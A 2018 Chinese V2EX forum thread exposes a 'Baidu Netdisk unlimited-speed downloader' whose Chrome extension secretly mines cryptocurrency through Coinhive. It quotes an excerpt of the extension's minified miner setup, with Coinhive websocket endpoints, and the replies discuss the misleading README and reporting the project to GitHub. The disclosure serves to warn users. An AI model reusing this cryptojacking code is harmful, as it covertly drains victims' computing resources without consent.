V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
ynyounuo
V2EX  ›  分享发现

分享一个以「提高算力」为名在你电脑上挖矿的「百度网盘不限速下载器」

  •  9
     
  •   ynyounuo · 2018-03-02 19:43:30 +08:00 · 8837 次点击
    这是一个创建于 2219 天前的主题,其中的信息可能已经有所发展或是发生改变。

    最近有朋友告诉我自己电脑时常连接 coinhive 不知道为什么,一排查发现是这哥们安装了所谓「百度不限速下载器」

    这是一款通过算法来提速的高速下载器,支持 Windows 和 Mac。 请在官方地址下载,本程序不会获取您的任何隐私,绝对无毒,请放心使用。 本软件将持续更新,目标是打造一个最好用的高速下载器。

    插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力

    实际上这东西就是用 Chrome 拓展执行 coinhive 挖矿,然后本地程序大概是打包了一个 aria2 和大概类似 BaiduExporter 的 Electron 程序。

    拓展后台运行:

         var q = navigator.hardwareConcurrency || 4;
            H = d.threads || q,
                function() {
                    return void 0 !== window.WebAssembly
                }() && d.forceASMJS, S = Z, v = b;
            var $ = "ifExclusiveTab",
                ll = "forceMultiTab",
                dl = "forceExclusiveTab",
                Zl = function(l) {
                    return (window.URL || window.webkitURL || window.mozURL).createObjectURL(new Blob([l]))
                }(m.default),
                bl = {
                    LIB_URL: "https://coinhive.com/lib/",
                    ASMJS_NAME: "worker-asmjs.min.js",
                    REQUIRES_AUTH: !1,
                    WEBSOCKET_SHARDS: [
                        ["wss://ws001.coinhive.com/proxy", "wss://ws002.coinhive.com/proxy", "wss://ws003.coinhive.com/proxy", "wss://ws004.coinhive.com/proxy", "wss://ws005.coinhive.com/proxy", "wss://ws006.coinhive.com/proxy", "wss://ws007.coinhive.com/proxy", "wss://ws029.coinhive.com/proxy"],
                        ["wss://ws008.coinhive.com/proxy", "wss://ws009.coinhive.com/proxy", "wss://ws010.coinhive.com/proxy", "wss://ws011.coinhive.com/proxy", "wss://ws012.coinhive.com/proxy", "wss://ws013.coinhive.com/proxy", "wss://ws014.coinhive.com/proxy", "wss://ws030.coinhive.com/proxy"],
                        ["wss://ws015.coinhive.com/proxy", "wss://ws016.coinhive.com/proxy", "wss://ws017.coinhive.com/proxy", "wss://ws018.coinhive.com/proxy", "wss://ws019.coinhive.com/proxy", "wss://ws020.coinhive.com/proxy", "wss://ws021.coinhive.com/proxy", "wss://ws031.coinhive.com/proxy"],
                        ["wss://ws022.coinhive.com/proxy", "wss://ws023.coinhive.com/proxy", "wss://ws024.coinhive.com/proxy", "wss://ws025.coinhive.com/proxy", "wss://ws026.coinhive.com/proxy", "wss://ws027.coinhive.com/proxy", "wss://ws028.coinhive.com/proxy", "wss://ws032.coinhive.com/proxy"]
                    ],
                    CAPTCHA_URL: "https://coinhive.com/captcha/",
                    MINER_URL: "https://coinhive.com/media/miner.html",
                    AUTH_URL: "https://authedmine.com/authenticate.html"
                },
                Vl = function() {
                    this.worker = new Worker(Zl), this.worker.onmessage = this.onReady.bind(this), this.currentJob = null, this.verifyJob = null, this.jobCallback = function() {}, this.verifyCallback = function() {}, this._isReady = !1, this.hashesPerSecond = 0, this.hashesTotal = 0, this.running = !1, this.lastMessageTimestamp = Date.now()
                }
    

    完整: https://gist.github.com/anonymous/1774ff85f84d07fdbeaefef44a236d34

    本地程序结构:

    ├── dist-assets
    │   ├── aria2.conf
    │   ├── aria2.session
    │   ├── aria2c
    │   └── aria2c.exe
    ├── init.js
    ├── lib
    │   ├── main.js
    │   └── page
    │       ├── index.css
    │       ├── index.html
    │       └── index.js
    └── package.json
    

    https://www.jianshu.com/p/075692b9feab

    https://github.com/high-speed-downloader/high-speed-downloader

    就这玩意儿有 800 多个 Star,其中一个现已匿名的维护者有将近 700 个 follower。

    匿名的维护者八成之前还是个 vim 圈稍有点名气的人,因为被「依云」啊,「 mattn 」啊等人关注 。而且八成也可能逛 V 站,follower 里有看到不少 V 友

    中枪的朋友赶紧清理了吧 - -

    后台占用小量 CPU 挖矿并不可耻,明说就好,愿意的人自然会愿意。 但是藏着代码骗不懂的人真的挺可耻的。

    29 条回复    2018-03-22 16:03:36 +08:00
    lScarlet
        1
    lScarlet  
       2018-03-02 19:49:55 +08:00 via Android
    马克😏
    zcbenz
        2
    zcbenz  
       2018-03-02 20:00:31 +08:00 via iPhone   ❤️ 1
    建议把这个项目向 GitHub 官方举报,这种恶意代码已经涉嫌违反用户协议了。
    ynyounuo
        3
    ynyounuo  
    OP
       2018-03-02 20:01:42 +08:00
    @zcbenz 举报过了,不过作者是把代码藏起来的,GitHub 只是以「开源」为幌子的发布站。
    feverzsj
        4
    feverzsj  
       2018-03-02 20:03:05 +08:00   ❤️ 1
    这些人做的勾当就像小电影开场的澳门博彩一样
    miyuki
        5
    miyuki  
       2018-03-02 20:03:30 +08:00
    插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力


    我觉得还是说明白点比较好
    prolic
        6
    prolic  
       2018-03-02 20:10:09 +08:00 via Android   ❤️ 1
    提高(我的分布式矿机)算力
    chroming
        7
    chroming  
       2018-03-02 20:26:30 +08:00 via Android
    竟然置顶了
    ynyounuo
        8
    ynyounuo  
    OP
       2018-03-02 20:53:15 +08:00 via iPhone
    @chroming 200 铜币
    madNeal
        9
    madNeal  
       2018-03-02 21:26:18 +08:00 via Android
    那个外卖红包的也有挖矿的吧
    discrete
        10
    discrete  
       2018-03-02 21:56:39 +08:00
    项目 README 不是写明了吗,最后一段。
    XiaolinLeo
        11
    XiaolinLeo  
       2018-03-02 22:03:13 +08:00 via iPhone
    插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力,用户可以自行对比打开插件和关闭插件后 CPU 占用率以及其他各项性能的差别,折合成经济成本,每人每天不到 1 分钱,一个月不到 3 角钱,收益将用于项目维持,不会对个人电脑造成任何的损害,不用时关闭插件即可。特别再次申明,在该项目创立之初,作者几经权衡之后,出于互利共赢的考虑,还是在软件付费、商业广告和占用一点空闲的 CPU 之间选择了后者,如果对此特别介意的用户,请绕行。
    ynyounuo
        12
    ynyounuo  
    OP
       2018-03-02 22:08:34 +08:00 via iPhone   ❤️ 3
    @discrete 这也算明说。那我植入木马不如说「用于提高眼界」
    miyuki
        13
    miyuki  
       2018-03-02 22:23:52 +08:00
    @discrete 这个 README 也就能糊弄糊弄不懂的了
    nolan1864
        14
    nolan1864  
       2018-03-02 22:28:06 +08:00   ❤️ 1
    @discrete
    @XiaolinLeo
    开头:这是一款通过算法来提速的高速下载器,支持 Windows 和 Mac。
    结尾:插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力

    这个 5%他意思是说为了提高下载速度吧,没说是给他挖矿吧,这么明显的误导文字有什么好洗的。
    cszhiyue
        15
    cszhiyue  
       2018-03-02 22:43:12 +08:00
    这种实际上并没有开源的。还求 star 是一种什么心理?
    noahziheng
        16
    noahziheng  
       2018-03-02 23:42:30 +08:00 via Android
    表示十分可怕,貌似楼主提到的匿名作者并不是匿名,貌似是 GitHub 系统的非法 E-mail 帐户...
    因为那个帐户的活动记录一直到 1969 年...那时候 Github 显然还不存在...而 UNIX 时间戳向前最早就是到 1970 年,正好...这玩意显然只能从系统层面配置成这样,大概就是注册时间为 0 吧...
    至于那些 Follower...大概是发现这个账户之后跟着玩的...
    ynyounuo
        17
    ynyounuo  
    OP
       2018-03-03 00:10:25 +08:00 via iPhone
    @noahziheng
    原来是官方账号,我还说呢。
    那大概就是作者的 git config 有问题(没有用新账号的信息 commit )或者故意搞成这样。
    zuolan
        18
    zuolan  
       2018-03-03 07:45:44 +08:00 via Android
    @noahziheng 这种匿名账号是怎么存在的?
    noahziheng
        19
    noahziheng  
       2018-03-03 11:05:25 +08:00 via Android
    @zuolan 看起来像是官方预置进去的或者是 web 端实现的时候的如果信息不正确就显示的默认值
    noahziheng
        20
    noahziheng  
       2018-03-03 11:06:33 +08:00 via Android
    @ynyounuo 故意的可能性比较大,想用这种方式匿名,后来才注册了那个项目名的账号
    scofieldpeng
        21
    scofieldpeng  
       2018-03-03 11:22:03 +08:00
    这个 APP 中招的应该很多,之前下载某个镜像,受制于国内环境,居然只有百毒盘有,没办法搞了一个按小时收费的 VIP,然后淘宝卖家极力推荐我用这个不限速,我一看,这特么把我当猴耍呢,于是把挖矿脚本删除了再用的,实际发现并没有卵用的提速,最后还是换回了百毒官方客户端。这东西估计骗到了不少小白用户。。。
    LeungJZ
        22
    LeungJZ  
       2018-03-03 11:32:39 +08:00
    为啥不用 油猴 + IDM( MAC 可以用 PDM)
    ynyounuo
        23
    ynyounuo  
    OP
       2018-03-03 11:33:55 +08:00 via iPhone
    @LeungJZ
    我就不用百度云。没啥刚需。
    ynyounuo
        24
    ynyounuo  
    OP
       2018-03-03 11:35:51 +08:00 via iPhone
    @scofieldpeng 哇,把这个卖家晒出来呗。现在这些黑产都成系统的啊。
    whwq2012
        25
    whwq2012  
       2018-03-03 17:38:39 +08:00
    没挖过矿,如果真的只在使用的时候占用 5%cpu,即开即用的话,那可以理解。
    yyn618
        26
    yyn618  
       2018-03-04 08:10:17 +08:00 via Android
    之前用过一段时间 表示一眼看懂没什么可误解的? 不过用不到 油猴插件完全能解决哇
    ynyounuo
        27
    ynyounuo  
    OP
       2018-03-04 08:29:21 +08:00 via iPhone
    @whwq2012
    你想多了。挖矿的核心代码在 Chrome 拓展上,所以你浏览网页的时候就会挖矿。也并没有看到哪里有限制 CPU 占用。

    @yyn618
    误解?这应该叫诱导性解释吧。
    woyaojizhu8
        28
    woyaojizhu8  
       2018-03-04 22:16:48 +08:00
    在这险恶的世道,跟其他相比,这确实能算明说了
    vodo
        29
    vodo  
       2018-03-22 16:03:36 +08:00
    唉,,,
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   2633 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 28ms · UTC 15:32 · PVG 23:32 · LAX 08:32 · JFK 11:32
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.